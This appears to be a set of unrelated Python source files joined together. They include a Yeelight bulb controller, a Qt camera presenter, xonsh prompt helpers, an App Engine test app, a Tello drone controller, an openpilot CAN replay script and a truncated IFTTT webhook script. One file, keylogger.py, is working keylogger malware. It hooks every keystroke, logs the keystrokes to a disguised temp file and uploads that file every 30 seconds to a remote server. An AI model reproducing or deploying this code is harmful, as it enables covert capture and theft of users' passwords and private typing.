app.run(host='0.0.0.0', port=10004)
|
YeelightServer.py
|
import time
import re
import json
import socket
import threading
import base64
import logging
import urllib
import sys
import errno
from thirdparty.YLBaseServer import YLBaseServer
reload(sys)
sys.setdefaultencoding('utf8')
class Message:
def __str__(self):
return ' '.join(['%s:%s' % item for item in self.__dict__.items()])
class YeelightException(Exception):
pass
class Yeelight(object):
@property
def location(self):
return self._location
@location.setter
def location(self, value):
self._location = value
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = base64.b64decode(value)
@property
def power(self):
return self._power
@power.setter
def power(self, value):
self._power = value
@property
def bright(self):
return self._bright
@bright.setter
def bright(self, value):
self._bright = value
@property
def hue(self):
return self._hue
@hue.setter
def hue(self, value):
self._hue = value
@property
def sat(self):
return self._sat
@sat.setter
def sat(self, value):
self._sat = value
@property
def rgb(self):
return self._rgb
@rgb.setter
def rgb(self, value):
self._rgb = value
@property
def model(self):
return self._model
@model.setter
def model(self, value):
self._model = value
@property
def color_mode(self):
return self._color_mode
@color_mode.setter
def color_mode(self, value):
self._color_mode = value
def to_dict(self):
dict = {}
for item in self.__dict__.items():
key, value = item
# first char _
dict[key[1:]] = value
return dict
def __str__(self):
return '\n'.join(['%s:%s' % item for item in self.__dict__.items()])
class YeelightClient(object):
def __init__(self, addr):
self._addr = addr
self._host, self._port = addr.split(':')
self._connected = False
self._thread = None
self._sock = None
def run(self):
try:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.connect((self._host, int(self._port)))
self._thread = threading.Thread(target=self._run)
self._thread.setDaemon(True)
self._thread.start()
self._connected = True
except socket.error, e:
raise YeelightException('%s(%s)' % (self._addr, e))
def _run(self):
while self._connected:
try:
response = self._sock.recv(2048)
if not response:
break
self._sock.settimeout(None)
logging.debug('<< Yeelight Light Received: %s', response)
obj = json.loads(response)
method = obj.get('method', None)
if method == 'props':
params = obj.get('params', None)
if params:
# self._light.name = params.get('name', self._light.name)
self._light.power = params.get(
'power', self._light.power)
# self._light.model = params.get('model', self._light.model)
self._light.color_mode = params.get(
'color_mode', self._light.color_mode)
self._light.rgb = params.get('rgb', self._light.rgb)
self._light.hue = params.get('hue', self._light.hue)
self._light.sat = params.get('sat', self._light.sat)
self._light.bright = params.get(
'bright', self._light.bright)
except socket.error, e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
break
logging.error('-- Yeelight (%s)', e)
def modify_light(data):
pass
def send(self, data):
'''send command to Yeelight'''
if self._connected:
try:
self._sock.send(data)
except socket.error, e:
self._connected = False
logging.error('-- Yeelight (%s)', e)
def close(self):
self._connected = False
self._sock.close()
@property
def addr(self):
'''address host:port'''
return self._addr
@property
def is_connected(self):
'''client is connected'''
return self._connected
@property
def light(self):
return self._light
@light.setter
def light(self, value):
self._light = value
class YeelightServer(YLBaseServer):
SUDDEN = 'sudden'
# gradual fashion
SMOOTH = 'smooth'
# success
OK = 'HTTP/1.1 200 OK'
# ssdp search
SEARCH = 'M-SEARCH * HTTP/1.1'
# ssdp notify
NOTIFY = 'NOTIFY * HTTP/1.1'
# default Light addr
HOST_LIGHT = '239.255.255.250'
PORT_LIGHT = 1982
# enter
CR = '\r'
# new line
LF = '\n'
# enter + new line
CRLF = CR + LF
def __init__(self):
self._socket_scan = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._light_clients = []
# Light prop
# def get_props(self, addr):
# try:
# props = {'prop': ['name', 'power', 'hue', 'sat', 'rgb', 'bright']}
# ret = self.get_prop(addr, props)
# if ret:
# result = json.loads(ret).get('result', [])
# if len(result) > 0:
# for light in self._lights:
# if light.location == addr:
# light.name = result[0]
# light.power = result[1]
# light.hue = result[2]
# light.sat = result[3]
# light.rgb = result[4]
# light.bright = result[5]
# break
# return ret
# except Exception, e:
# logging.error(e)
# Light command get_prop
def get_prop(self, addr, arg):
return self._cmd(addr, 'get_prop', arg.get('prop', []))
# Light command set_scene
def set_scene(self, addr, arg):
return self._cmd(addr, 'set_scene', arg.get('class', []))
# Light command power_on
def power_on(self, addr, arg):
return self.set_power(addr, 'on', arg.get('effect', self.SMOOTH), arg.get('duration', 500))
# Light command power_off
def power_off(self, addr, arg):
return self.set_power(addr, 'off', arg.get('effect', self.SMOOTH), arg.get('duration', 500))
# Light command set_power
def set_power(self, addr, stat, effect, duration):
return self._cmd(addr, 'set_power', [stat, effect, duration])
# Light command start_cf
def start_cf(self, addr, arg):
return self._cmd(addr, 'start_cf', [arg.get('count', 0), arg.get('action', 0), arg.get('flow_expression', "")])
# Light command stop_cf
def stop_cf(self, addr, arg):
return self._cmd(addr, 'stop_cf', [])
# Light command cron_add
def cron_add(self, addr, arg):
return self._cmd(addr, 'cron_add', [0, arg.get('value', 0)])
# Light command cron_get
def cron_get(self, addr, arg):
return self._cmd(addr, 'cron_get', [0])
# Light command cron_del
def cron_del(self, addr, arg):
return self._cmd(addr, 'cron_del', [0])
# Light command set_adjust
def set_adjust(self, addr, arg):
return self._cmd(addr, 'set_adjust', [arg.get('action', 'increase'), arg.get('prop', 'bright')])
# Light command set_bright
def set_bright(self, addr, arg):
return self._cmd(addr, 'set_bright', [arg.get('brightness', 30), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_rgb
def set_rgb(self, addr, arg):
return self._cmd(addr, 'set_rgb', [arg.get('rgb', 16777215), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_hsv
def set_hsv(self, addr, arg):
return self._cmd(addr, 'set_hsv', [arg.get('hue', 0), arg.get('sat', 0), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_ct_abx
def set_ct_abx(self, addr, arg):
return self._cmd(addr, 'set_ct_abx', [arg.get('ct_value', 1700), arg.get('effect', self.SMOOTH), arg.get('duration', 500)])
# Light command set_default
def set_default(self, addr, arg):
return self._cmd(addr, 'set_default', [])
# Light command toggle
def toggle(self, addr, arg):
return self._cmd(addr, 'toggle', [])
# Light command set_name
def set_name(self, addr, arg):
return self._cmd(addr, 'set_name', [base64.b64encode(arg.get('name', 'noname'))])
# Light command set_music
def set_music(self, addr, arg):
pass
def get_devices(self, *args):
pass
# Light command search
def search(self, *args):
command = self.SEARCH + self.CRLF + \
'HOST: %s:%s' % (self.HOST_LIGHT, self.PORT_LIGHT) + self.CRLF + \
'MAN: "ssdp:discover"' + self.CRLF + \
'ST: wifi_bulb' + self.CRLF
logging.debug('>> Yeelight Search %s',
re.compile('[\r|\n]').sub(' ', command))
self._socket_scan.sendto(
command, 0, (self.HOST_LIGHT, self.PORT_LIGHT))
return 'ok'
# control command
def ccmd(self, location, method, param):
param = param or {}
try:
obj = json.loads(urllib.unquote(param))
except Exception, e:
obj = {}
try:
return getattr(self, method)(location, obj)
except socket.error, e:
logging.error('-- Yeelight connect(%s)', e)
except Exception, e:
logging.error('-- Yeelight method(%s)', e)
# get connect light client
def _get_light_client(self, addr, is_new=False):
ret_client = None
lost_client = None
for client in self._light_clients:
if client.addr == addr:
if client.is_connected:
ret_client = client
else:
lost_client = client
break
if lost_client:
'''remove lost connection'''
self._light_clients.remove(lost_client)
if not ret_client and not is_new:
raise YeelightException('%s not found!' % addr)
if is_new and not ret_client:
ret_client = YeelightClient(addr)
self._light_clients.append(ret_client)
return ret_client
# parse header
def _parse(self, data):
message = Message()
try:
headers = data.split(self.LF)
if headers and len(headers) > 0:
for header in headers:
header = header.strip()
if header == '':
continue
kv = header.split(':', 1)
if kv and len(kv) > 1:
key = kv[0].strip().lower()
value = kv[1].strip()
else:
key = 'status'
value = kv[0]
setattr(message, key, value)
except Exception, e:
logging.error('-- Yeelight (%s)', e)
return message
# send command to Light
def _cmd(self, addr, method, data):
str = json.dumps(
{'id': int(time.time()), 'method': method, 'params': data})
logging.debug('>> Yeelight Send command %s [%s]', addr, str)
try:
light_client = self._get_light_client(addr)
light_client.send(str + self.CRLF)
return 'ok'
except Exception, e:
logging.error('-- Yeelight (%s)', e)
return 'error'
# discover
def _discover(self, message):
try:
if not hasattr(message, 'location'):
logging.debug(
'-- Yeelight Not Yeelight message, drop it (%s)', message)
return
match = re.match(
r'yeelight://[0-9]{1,3}(\.[0-9]{1,3}){3}:([0-9]*)', message.location)
if match == None:
return
addr = message.location.split('//')[1]
light = Yeelight()
light.id = message.id
light.name = message.name
light.power = message.power
light.location = addr
light.model = message.model
light.color_mode = message.color_mode
light.rgb = message.rgb
light.hue = message.hue
light.sat = message.sat
light.bright = message.bright
except Exception, e:
logging.error('-- Yeelight Parse light error(%s)', e)
try:
client = self._get_light_client(addr, True)
client.light = light
client.run()
except YeelightException, e:
logging.error('-- Yeelight Build client error(%s)', e)
# empty
def _empty(self, *args):
logging.debug('-- Yeelight Empty: %s', args)
def get_local_ip(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(('8.8.8.8', 80))
(addr, port) = sock.getsockname()
sock.close()
return addr
# _start_scan server
def _start_scan(self):
while True:
try:
data, addr = self._socket_scan.recvfrom(2048)
logging.debug('<< Yeelight Scanner Received:%s from %s',
re.compile('[\r|\n]').sub(' ', data), addr)
self._discover(self._parse(data))
except socket.error, e:
pass
self._socket_scan.close()
# passive server
def _start_passive(self):
local_ip = self.get_local_ip()
self._socket_passive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket_passive.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind
self._socket_passive.bind(('', self.PORT_LIGHT))
# add Light mcast
self._socket_passive.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.HOST_LIGHT) + socket.inet_aton(local_ip))
while True:
try:
data, addr = self._socket_passive.recvfrom(2048)
logging.debug('<< Yeelight Passive Received:%s from %s',
re.compile('[\r|\n]').sub(' ', data), addr)
self._discover(self._parse(data))
except socket.error, e:
logging.error('-- Yeelight (%s)', e)
# leave Light mcast
self._socket_passive.setsockopt(socket.SOL_IP, socket.IP_DROP_MEMBERSHIP,
socket.inet_aton(HOST_LIGHT) +
socket.inet_aton(local_ip))
self._socket_passive.close()
def startup(self):
# passive create thread
t1 = threading.Thread(target=self._start_passive)
t1.setDaemon(True)
t1.start()
# scan create thread
t2 = threading.Thread(target=self._start_scan)
t2.setDaemon(True)
t2.start()
self.search()
def handle(self, args):
method = args.get('method')
ret = self.ccmd(args.get('location'), method, args.get('param'))
if method == 'get_devices':
result = []
for client in self._light_clients:
result.append(client.light.to_dict())
return result
return ret
def name(self):
return 'Yeelight'
|
Presenter.py
|
# This Python file uses the following encoding: utf-8
import threading
from PySide2.QtCore import Slot, Signal, QObject, QThread
from PySide2.QtGui import QImage
import Camera
import ImageProcessor
import SerialCommunicator
class Presenter(QObject):
'''
Main class for model-view communications
It communicates via QT Signals and Slots
'''
newFrame = Signal()
finishedStreaming = Signal()
startedStreaming = Signal()
cameraClosed = Signal()
progressUpdate = Signal(float)
plottingStarted = Signal()
plottingStopped = Signal()
serialPorts = Signal(str)
connectionTimeout = Signal(str)
def __init__(self):
QObject.__init__(self)
self.processor = ImageProcessor.ImageProcessor()
self.serial = SerialCommunicator.SerialCommunicator()
self.thread = None
self.camera = None
self.isStreaming = False
self.isCameraOpen = False
self.startCamera()
@Slot()
def startCamera(self):
if not self.isCameraOpen:
self.camera = Camera.Camera()
self.thread = QThread()
self.camera.moveToThread(self.thread)
self.camera.newImage.connect(self.newFrame)
self.camera.released.connect(self.thread.quit)
self.camera.finishedStreaming.connect(self.finishedStreaming)
self.thread.started.connect(self.camera.stream)
self.thread.finished.connect(self.cameraClosed)
self.thread.start()
self.camera.streaming = True
self.isStreaming = True
self.isCameraOpen = True
self.startedStreaming.emit()
@Slot()
def stopCamera(self):
if self.isStreaming:
self.isStreaming = False
self.camera.stop()
elif self.isCameraOpen:
self.isCameraOpen = False
self.camera.release()
@Slot()
def processImage(self):
image = self.processor.process(Camera.global_image)
image = QImage(image.data, image.shape[1], image.shape[0], QImage.Format_BGR888)
self.camera.changeGlobalImage(image)
self.getSerialPorts()
self.stopCamera()
@Slot(str)
def startPlotting(self, port):
print("Selected Port: ", port)
self.serial.progressUpdate.connect(self.progressUpdate)
self.serial.plottingStarted.connect(self.plottingStarted)
self.serial.connectionTimeout.connect(self.connectionTimeout)
self.serial.plottingStopped.connect(self.plottingStopped)
thread_gcode = threading.Thread(target=self.serial.sendGcode, args=(port, ), daemon=True)
thread_gcode.start()
@Slot(int, int)
def openPreviewImage(self, width, height):
if not self.isCameraOpen:
self.processor.openPreviewImage(width, height)
def getSerialPorts(self):
ports = self.serial.getSerialPorts()
for port in ports:
self.serialPorts.emit(port)
|
keylogger.py
|
import pythoncom, pyHook, requests
import tempfile
import threading
import time
def keyPressed(event):
global store
mappings = {8: "<backspace>", 13: "\n", 27: "<esc>", 32: " ", 46: "<del>", 91: "<win>",
160: "<shft>", 162: "<ctrl>", 163: "<r-ctrl>", 164: "<alt>", 165: "<ralt>", 9: "<tab>",
48: "0", 49: "1", 50: "2", 51: "3", 52: "4", 53: "5", 54: "6", 55: "7", 56: "8", 57: "9",
37: "←", 38: "↑", 39: "→", 40: "↓",
192: "ö", 222: "ä", 186: "ü", 187: "+", 191: "#",
188: ",", 190: ".", 189: "-", 219: "ß", 221: "´", 107: "+", 109: "-", 111: "/", 106: "*"
}
try:
id = event.KeyID
if not id in mappings:
char = chr(id).lower()
else:
char = mappings.get(id)
store = store + char
fp = open(tempfile.gettempdir()+'\\logs_windows.txt','w+')
print(char,end='')
fp.write(store)
fp.close()
except Exception as e:
print(str(e))
return True
def uploadFile():
while True:
time.sleep(30)
try:
url = 'https://your_server_address/python_file.php'
files = {'file': open(tempfile.gettempdir()+'\\logs_windows.txt', 'rb')}
r = requests.post(url, files=files)
print(str(r.text))
except:
pass
store = ''
t1 = threading.Thread(target=uploadFile)
t1.start()
obj = pyHook.HookManager()
obj.KeyDown = keyPressed
obj.HookKeyboard()
pythoncom.PumpMessages()
|
vc.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branches"""
# pylint:disable=no-member, invalid-name
import os
import sys
import queue
import builtins
import threading
import subprocess
import re
import pathlib
import xonsh.tools as xt
from xonsh.lazyasd import LazyObject
RE_REMOVE_ANSI = LazyObject(
lambda: re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]"),
globals(),
"RE_REMOVE_ANSI",
)
def _get_git_branch(q):
denv = builtins.__xonsh__.env.detype()
try:
cmd = ["git", "rev-parse", "--abbrev-ref", "HEAD"]
branch = xt.decode_bytes(
subprocess.check_output(cmd, env=denv, stderr=subprocess.DEVNULL)
)
branch = branch.splitlines()[0] or None
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(branch)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
if branch:
branch = RE_REMOVE_ANSI.sub("", branch)
except queue.Empty:
branch = None
return branch
def _get_hg_root(q):
_curpwd = builtins.__xonsh__.env["PWD"]
while True:
if not os.path.isdir(_curpwd):
return False
try:
dot_hg_is_in_curwd = any([b.name == ".hg" for b in xt.scandir(_curpwd)])
except OSError:
return False
if dot_hg_is_in_curwd:
q.put(_curpwd)
break
else:
_oldpwd = _curpwd
_curpwd = os.path.split(_curpwd)[0]
if _oldpwd == _curpwd:
return False
def get_hg_branch(root=None):
"""Try to get the mercurial branch of the current directory,
return None if not in a repo or subprocess.TimeoutExpired if timed out.
"""
env = builtins.__xonsh__.env
timeout = env["VC_BRANCH_TIMEOUT"]
q = queue.Queue()
t = threading.Thread(target=_get_hg_root, args=(q,))
t.start()
t.join(timeout=timeout)
try:
root = pathlib.Path(q.get_nowait())
except queue.Empty:
return None
if env.get("VC_HG_SHOW_BRANCH"):
# get branch name
branch_path = root / ".hg" / "branch"
if branch_path.exists():
with open(branch_path, "r") as branch_file:
branch = branch_file.read().strip()
else:
branch = "default"
else:
branch = ""
# add activated bookmark and topic
for filename in ["bookmarks.current", "topic"]:
feature_branch_path = root / ".hg" / filename
if feature_branch_path.exists():
with open(feature_branch_path) as file:
feature_branch = file.read().strip()
if feature_branch:
if branch:
if filename == "topic":
branch = f"{branch}/{feature_branch}"
else:
branch = f"{branch}, {feature_branch}"
else:
branch = feature_branch
return branch
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh__.env["SUPPRESS_BRANCH_TIMEOUT_MESSAGE"]
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print(
"xonsh: branch timeout: computing the branch name, color, or both "
"timed out while formatting the prompt. You may avoid this by "
"increasing the value of $VC_BRANCH_TIMEOUT or by removing branch "
"fields, like {curr_branch}, from your $PROMPT. See the FAQ "
"for more details. This message will be suppressed for the remainder "
"of this session. To suppress this message permanently, set "
"$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.",
file=sys.stderr,
)
def _vc_has(binary):
""" This allows us to locate binaries after git only if necessary """
cmds = builtins.__xonsh__.commands_cache
if cmds.is_empty():
return bool(cmds.locate_binary(binary, ignore_alias=True))
else:
return bool(cmds.lazy_locate_binary(binary, ignore_alias=True))
def current_branch():
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
branch = None
if _vc_has("git"):
branch = get_git_branch()
if not branch and _vc_has("hg"):
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = "<branch-timeout>"
_first_branch_timeout_message()
return branch or None
def _git_dirty_working_directory(q, include_untracked):
denv = builtins.__xonsh__.env.detype()
try:
# Borrowed from this conversation
# https://github.com/sindresorhus/pure/issues/115
if include_untracked:
cmd = [
"git",
"status",
"--porcelain",
"--quiet",
"--untracked-files=normal",
]
else:
unindexed = ["git", "diff", "--no-ext-diff", "--quiet"]
indexed = unindexed + ["--cached", "HEAD"]
cmd = unindexed + ["||"] + indexed
child = subprocess.run(cmd, stderr=subprocess.DEVNULL, env=denv)
# "--quiet" git commands imply "--exit-code", which returns:
# 1 if there are differences
# 0 if there are no differences
dwd = bool(child.returncode)
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(dwd)
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(
target=_git_dirty_working_directory, args=(q, include_untracked)
)
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
If this cannot be determined, None is returned.
"""
env = builtins.__xonsh__.env
cwd = env["PWD"]
denv = env.detype()
vcbt = env["VC_BRANCH_TIMEOUT"]
# Override user configurations settings and aliases
denv["HGRCPATH"] = ""
try:
s = subprocess.check_output(
["hg", "identify", "--id"],
stderr=subprocess.PIPE,
cwd=cwd,
timeout=vcbt,
universal_newlines=True,
env=denv,
)
return s.strip(os.linesep).endswith("+")
except (
subprocess.CalledProcessError,
subprocess.TimeoutExpired,
FileNotFoundError,
):
return None
def dirty_working_directory():
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
if _vc_has("git"):
dwd = git_dirty_working_directory()
if dwd is None and _vc_has("hg"):
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BOLD_INTENSE_YELLOW}"
elif dwd:
color = "{BOLD_INTENSE_RED}"
else:
color = "{BOLD_INTENSE_GREEN}"
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are background colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BACKGROUND_YELLOW}"
elif dwd:
color = "{BACKGROUND_RED}"
else:
color = "{BACKGROUND_GREEN}"
return color
|
services_test_app.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""App that tests api server to see if services are connected.
Each endpoint tests a different service. An endpoints respond with 200
if it is working, and 500 if there are any exceptions
"""
# This file conforms to the external style guide
# pylint: disable=bad-indentation
import sys
import logging
import socket
import threading
import webapp2
from google.appengine.api import memcache
from google.appengine.api.logservice import logservice
from google.appengine.ext import ndb
def respond_with_error(func):
"""Wraps func so that it writes all Exceptions to response."""
def get_func(self):
"""Handle a get request respond with 500 status code on error."""
try:
func(self)
except Exception as excep: # pylint: disable=broad-except
self.response.set_status(500)
self.response.write(str(excep))
return get_func
# pylint: disable=no-member
class Message(ndb.Model): # pylint: disable=too-few-public-methods
"""Models a simple message."""
content = ndb.StringProperty()
# pylint: disable=no-self-use
class DataStoreTest(webapp2.RequestHandler):
"""Test that the datastore is connected."""
@respond_with_error
def get(self):
"""Ensure that the datastore works."""
Message(content='Hi', parent=ndb.Key(Message, 'test')).put()
msg = Message.query(ancestor=ndb.Key(Message, 'test')).get()
assert msg.content == 'Hi', ('\"%s\" is not \"%s\"' %
(msg.content, 'Hi'))
class LoggingTest(webapp2.RequestHandler):
"""Test that logservice is connected."""
@respond_with_error
def get(self):
"""Ensure that the log service works."""
logservice.write('Hi')
logservice.flush()
class MemcacheTest(webapp2.RequestHandler):
"""Test that memcache is connected."""
@respond_with_error
def get(self):
"""Ensure that memcache works."""
memcache.set('test', 'hi')
assert memcache.get('test') == 'hi', 'Memcache failure'
def socket_thread():
# Function that runs a little server on port 1000 that just echoes back
# the first chunk of data that it receives.
logging.info('In socket thread')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.bind(('', 1000))
s.listen(5)
while True:
c, addr = s.accept()
data = c.recv(1024)
c.send(data)
c.close()
class OpenPort(webapp2.RequestHandler):
"""Open port 1000."""
def get(self):
logging.info('Starting socket thread')
threading.Thread(target=socket_thread).start()
self.content_type = 'text/plain'
self.response.write('started thread.')
# pylint: disable=invalid-name
urls = [('/datastore', DataStoreTest),
('/logging', LoggingTest),
('/memcache', MemcacheTest),
('/openport', OpenPort)]
app = webapp2.WSGIApplication(urls, debug=True)
|
simplecontroller.py
|
from gui.pyevents import PyEvents
from gui.simplegui import SimpleGUI
from .controller import Controller
from drone import Tello
import pygame
import threading
import time
class SimpleController(Controller):
UP_DIR = "up"
DOWN_DIR = "down"
LEFT_DIR = "left"
RIGHT_DIR = "right"
W_DIR = "w"
S_DIR = "s"
A_DIR = "a"
D_DIR = "d"
def __init__(self, tello: Tello, gui: PyEvents):
super(SimpleController, self).__init__(tello)
self.speed = 50
self.send_rc_control = False
self.keys = {
self.UP_DIR: False,
self.DOWN_DIR: False,
self.LEFT_DIR: False,
self.RIGHT_DIR: False,
self.W_DIR: False,
self.S_DIR: False,
self.A_DIR: False,
self.D_DIR: False
}
gui.subscribe_keydown(self.pitchEvents(self.UP_DIR, True), pygame.K_UP)
gui.subscribe_keydown(self.pitchEvents(self.DOWN_DIR, True), pygame.K_DOWN)
gui.subscribe_keydown(self.rollEvents(self.RIGHT_DIR, True), pygame.K_RIGHT)
gui.subscribe_keydown(self.rollEvents(self.LEFT_DIR, True), pygame.K_LEFT)
gui.subscribe_keydown(self.thrustEvents(self.W_DIR, True), pygame.K_w)
gui.subscribe_keydown(self.thrustEvents(self.S_DIR, True), pygame.K_s)
gui.subscribe_keydown(self.yawEvents(self.A_DIR, True), pygame.K_a)
gui.subscribe_keydown(self.yawEvents(self.D_DIR, True), pygame.K_d)
gui.subscribe_keyup(self.pitchEvents(self.UP_DIR, False), pygame.K_UP)
gui.subscribe_keyup(self.pitchEvents(self.DOWN_DIR, False), pygame.K_DOWN)
gui.subscribe_keyup(self.rollEvents(self.RIGHT_DIR, False), pygame.K_RIGHT)
gui.subscribe_keyup(self.rollEvents(self.LEFT_DIR, False), pygame.K_LEFT)
gui.subscribe_keyup(self.thrustEvents(self.W_DIR, False), pygame.K_w)
gui.subscribe_keyup(self.thrustEvents(self.S_DIR, False), pygame.K_s)
gui.subscribe_keyup(self.yawEvents(self.A_DIR, False), pygame.K_a)
gui.subscribe_keyup(self.yawEvents(self.D_DIR, False), pygame.K_d)
gui.subscribe_keyup(self.takeoff, pygame.K_t)
gui.subscribe_keyup(self.land, pygame.K_l)
gui.subscribe_destructor(self.destruct)
# update_thread = threading.Thread(target=self.update, args=())
# update_thread.Daemon = True
# update_thread.start()
def pitchEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setPitch((self.keys[self.UP_DIR] - self.keys[self.DOWN_DIR]) * self.speed)
return eventFunc
def rollEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setRoll((self.keys[self.RIGHT_DIR] - self.keys[self.LEFT_DIR]) * self.speed)
return eventFunc
def thrustEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setThrust((self.keys[self.W_DIR] - self.keys[self.S_DIR]) * self.speed)
return eventFunc
def yawEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setYaw((self.keys[self.D_DIR] - self.keys[self.A_DIR]) * self.speed)
return eventFunc
|
can_replay.py
|
#!/usr/bin/env python3
import os
import time
import threading
from tqdm import tqdm
os.environ['FILEREADER_CACHE'] = '1'
from common.basedir import BASEDIR
from common.realtime import config_realtime_process, Ratekeeper, DT_CTRL
from selfdrive.boardd.boardd import can_capnp_to_can_list
from tools.lib.logreader import LogReader
from panda import Panda
try:
from panda_jungle import PandaJungle # pylint: disable=import-error
except Exception:
PandaJungle = None # type: ignore
def send_thread(s, flock):
if "Jungle" in str(type(s)):
if "FLASH" in os.environ:
with flock:
s.flash()
for i in [0, 1, 2, 3, 0xFFFF]:
s.can_clear(i)
s.set_ignition(False)
time.sleep(5)
s.set_ignition(True)
s.set_panda_power(True)
else:
s.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
s.set_can_loopback(False)
idx = 0
ign = True
rk = Ratekeeper(1 / DT_CTRL, print_delay_threshold=None)
while True:
# handle ignition cycling
if ENABLE_IGN:
i = (rk.frame*DT_CTRL) % (IGN_ON + IGN_OFF) < IGN_ON
if i != ign:
ign = i
s.set_ignition(ign)
snd = CAN_MSGS[idx]
snd = list(filter(lambda x: x[-1] <= 2, snd))
s.can_send_many(snd)
idx = (idx + 1) % len(CAN_MSGS)
# Drain panda message buffer
s.can_recv()
rk.keep_time()
def connect():
config_realtime_process(3, 55)
serials = {}
flashing_lock = threading.Lock()
while True:
# look for new devices
for p in [Panda, PandaJungle]:
if p is None:
continue
for s in p.list():
if s not in serials:
print("starting send thread for", s)
serials[s] = threading.Thread(target=send_thread, args=(p(s), flashing_lock))
serials[s].start()
# try to join all send threads
cur_serials = serials.copy()
for s, t in cur_serials.items():
t.join(0.01)
if not t.is_alive():
del serials[s]
time.sleep(1)
if __name__ == "__main__":
if PandaJungle is None:
print("\33[31m", "WARNING: cannot connect to jungles. Clone the jungle library to enable support:", "\033[0m") # type: ignore
print("\033[34m", f"cd {BASEDIR} && git clone https://github.com/commaai/panda_jungle", "\033[0m")
print("Loading log...")
ROUTE = "77611a1fac303767/2020-03-24--09-50-38"
REPLAY_SEGS = list(range(10, 16)) # route has 82 segments available
CAN_MSGS = []
for i in tqdm(REPLAY_SEGS):
log_url = f"https://commadataci.blob.core.windows.net/openpilotci/{ROUTE}/{i}/rlog.bz2"
lr = LogReader(log_url)
CAN_MSGS += [can_capnp_to_can_list(m.can) for m in lr if m.which() == 'can']
# set both to cycle ignition
IGN_ON = int(os.getenv("ON", "0"))
IGN_OFF = int(os.getenv("OFF", "0"))
ENABLE_IGN = IGN_ON > 0 and IGN_OFF > 0
if ENABLE_IGN:
print(f"Cycling ignition: on for {IGN_ON}s, off for {IGN_OFF}s")
connect()
|
webhook.py
|
'''
webhook.py
pj@mrpjevans.com
Create a WebHook at ifttt.com to do, well, whatever you want! Maybe send
an email to begin with. You'll give it a trigger name which is used to
create a URL something like the following:
https://maker.ifttt.com/trigger/{trigger_name}/with/key/{your_key}
Replace those two values in {} and got to the URL to check it's working.
Once you're happy, change WEBHOOK below to match. Run the script. Every time
the light is switched on, your WebHook is called.
Make you you update the IP address to match your gateway's and
run $ python3 -i -m pytradfri IP to (re)create your
tradfri_standalone_psk.conf (Credentials file)
'''
from pytradfri import Gateway
from pytradfri.api.libcoap_api import APIFactory
from pytradfri.util import load_json, save_json
from time import sleep
import urllib.request
import threading
# Change this IP address to your gateway
IP_ADDRESS = '192.168.0.158'
# Make sure you're in the same directory as this file
CONFIG_FILE = 'tradfri_standalone_psk.conf'
WEBHOOK = 'https://maker.ifttt.com/trigger/{trigger_name}/with/key/{your_key}'
values = {}
values['value1'] = 'Value 1'
values['value2'] = 'Next value'
values['value3'] = 'Last one'
data = urllib.parse.urlencode(values)
data = data.encode('ascii')
# Load in the file, get our password for the gateway and create an API
